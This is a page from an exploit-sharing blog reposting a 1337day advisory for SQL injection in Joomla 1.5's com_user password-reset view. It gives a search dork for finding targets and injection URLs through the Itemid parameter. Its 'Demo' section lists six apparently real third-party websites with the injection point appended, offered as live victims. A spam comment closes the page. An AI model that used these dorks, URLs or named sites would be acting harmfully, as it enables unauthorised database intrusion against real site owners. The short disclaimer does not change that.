xDay Exploit
v10
today : | at : | safemode : ON
> / home / facebook / twitter / exit /
name author perms com modified label

Joomla all v1.5 Error SQL Injection Vulnerability Unknown rwxr-xr-x 1 6:31 AM

Filename Joomla all v1.5 Error SQL Injection Vulnerability
Permission rw-r--r--
Author Unknown
Date and Time 6:31 AM
Label
Action
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`                   0
0  /_,     ___   /_/_      ___  ,_/ /   _ ___           1
1  /_/  /' _ `\ \/\ \/_/_\_<_  /'___  /    /`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit data**** separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm Caddy-dz member from Inj3ct0r Team                 1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

####
# Exploit Title: Joomla All v1.5 Error ****d SQL Injection Vulnerability
# Dork : inurl:option=com_user
# Security Risk: critical
# Tested on: Back|Track 5 KDE / French
####
# this was written for educational purpose only. use it at your own risk.
# author will be not responsible for any damage caused! user assumes all responsibility
# intended for authorized *** application pentesting only!

// De******ion :

the affected component is /com_user/ in all joomla v1.5
P.S : you could know the version by openning the source code of the target and searching for "joomla" you'll see the version :-)

// Exploit :

http://site.com/index.php?option=com_user&view=reset&lang=en&Itemid=1+(sql injection)
http://site.com/index.php?option=com_user&view=reset&lang=en&Itemid=x+(sql injection)   [replacing id number by character]

#  priv8 youtube link, just people who has the link could view : http://www.youtube.com/watch?v=g0QcjxIb68I

// Demo :

http://www.lyceeairbus.com/index.php?option=com_user&view=reset&lang=en&Itemid=1'
http://www.silviajewelry.com/index.php?option=com_user&view=reset&Itemid='
http://www.bklogisticsvn.com/index.php?option=com_user&view=reset&lang=en&Itemid='
http://algeria.ch/index.php?option=com_user&view=reset&lang=en&Itemid='
http://www.emissary.com/index.php?option=com_user&view=reset&lang=en&Itemid='
http://lookdezine.com/main/index.php?option=com_user&view=reset&lang=en&Itemid='

1 comments:

Blogger said...

Ever wanted to get free Twitter Re-tweets?
Did you know you can get these ON AUTO-PILOT & ABSOLUTELY FOR FREE by registering on Like 4 Like?

Post a Comment

 

xDay Exploit By : Anass Ibn El Farouk